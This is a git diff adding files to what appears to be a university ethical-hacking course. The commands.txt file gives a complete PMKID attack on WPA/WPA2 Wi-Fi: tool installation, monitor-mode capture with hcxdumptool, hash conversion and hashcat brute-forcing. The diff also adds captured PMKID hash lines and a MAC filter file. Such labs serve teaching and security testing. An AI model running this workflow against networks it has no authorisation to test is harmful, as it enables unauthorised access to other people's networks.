diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/New attack on WPA_WPA2 using PMKID.pdf b/EthicalHacking/Labs/WirelessUsingPMKID/New attack on WPA_WPA2 using PMKID.pdf new file mode 100644 index 0000000..daefdb4 Binary files /dev/null and b/EthicalHacking/Labs/WirelessUsingPMKID/New attack on WPA_WPA2 using PMKID.pdf differ diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/PMKID_Cracking.pptx b/EthicalHacking/Labs/WirelessUsingPMKID/PMKID_Cracking.pptx new file mode 100644 index 0000000..1993e23 Binary files /dev/null and b/EthicalHacking/Labs/WirelessUsingPMKID/PMKID_Cracking.pptx differ diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/commands.txt b/EthicalHacking/Labs/WirelessUsingPMKID/commands.txt new file mode 100644 index 0000000..7656b02 --- /dev/null +++ b/EthicalHacking/Labs/WirelessUsingPMKID/commands.txt @@ -0,0 +1,49 @@ +apt-get update +apt-get dist-upgrade -y +apt-get install libssl-dev +apt-get install libz-dev +apt-get install libpcap-dev -y +apt-get install libcurl4-openssl-dev + +git clone https://github.com/ZerBea/hcxdumptool +cd hcxdumptool +make +make install +hcxdumptool -h +hcxdumptool --version + +git clone https://github.com/ZerBea/hcxtools.git +cd hcxtools +make +make install +hcxpcptool -h +hcxpcptool -v + +hashcat -h +hashcat --version + +mkdir crack_PMKID +cd crack_PMKID + +airmon-ng start wlan0 +airodump-ng wlan0mon +echo ' mac.txt / +cat mac.txt +hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 --enable_status=3 +hcxpcaptool -z hashtocrack hash +cat hashtocrack + + +hashcat -m 16800 hashtocrack -a 3 -w 3 abcdef?l?l --force --potfile-disable + + +//-a -3 : attack model: brute-force +//-w 3: -workload-profile: high performance +// potfile: the potfile stores which hashes were already cracked, and thus won't be cracked again. + +1: hcxdumptool v4.2.0 or higher: https://github.com/ZerBea/hcxdumptool +2: hcxtools v4.2.0 or higher: https://github.com/ZerBea/hcxtools +3: hashcat v4.2.0 or higher: https://github.com/hashcat/hashcat + +Tutorial +https://www.youtube.com/watch?v=DarsUXcHTSU \ No newline at end of file diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hash b/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hash new file mode 100644 index 0000000..09714b7 Binary files /dev/null and b/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hash differ diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hashtocrack b/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hashtocrack new file mode 100644 index 0000000..b5ce76a --- /dev/null +++ b/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hashtocrack @@ -0,0 +1,2 @@ +d2302924c11c4ccb071f19be8c3d7273*4a5d3606cfc9*f0a225762645*46694f532d43384f47592d4775657374 +3726d31693692c5aa9a10c4a363aad7e*485d363c3d10*0c47c90cdb5c*46694f532d52454d4f32 diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/mac.txt b/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/mac.txt new file mode 100644 index 0000000..8a6b2a7 --- /dev/null +++ b/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/mac.txt @@ -0,0 +1 @@ +4A5D3606CFC9 diff --git a/FSCS630_Cryptography/labs/Hashbased_Message_Authentication_Code/HMAC_lab_Manual.pptx b/FSCS630_Cryptography/labs/Hashbased_Message_Authentication_Code/HMAC_lab_Manual.pptx index 4b45931..6427d59 100644 Binary files a/FSCS630_Cryptography/labs/Hashbased_Message_Authentication_Code/HMAC_lab_Manual.pptx and b/FSCS630_Cryptography/labs/Hashbased_Message_Authentication_Code/HMAC_lab_Manual.pptx differ diff --git a/FSCS630_Cryptography/labs/Hashbased_Message_Authentication_Code/Hacking WiFi Password in a few steps using a new attack on WPA_WPA2.pdf b/FSCS630_Cryptography/labs/Hashbased_Message_Authentication_Code/Hacking WiFi Password in a few steps using a new attack on WPA_WPA2.pdf new file mode 100644 index 0000000..47c404b Binary files /dev/null and b/FSCS630_Cryptography/labs/Hashbased_Message_Authentication_Code/Hacking WiFi Password in a few steps using a new attack on WPA_WPA2.pdf differ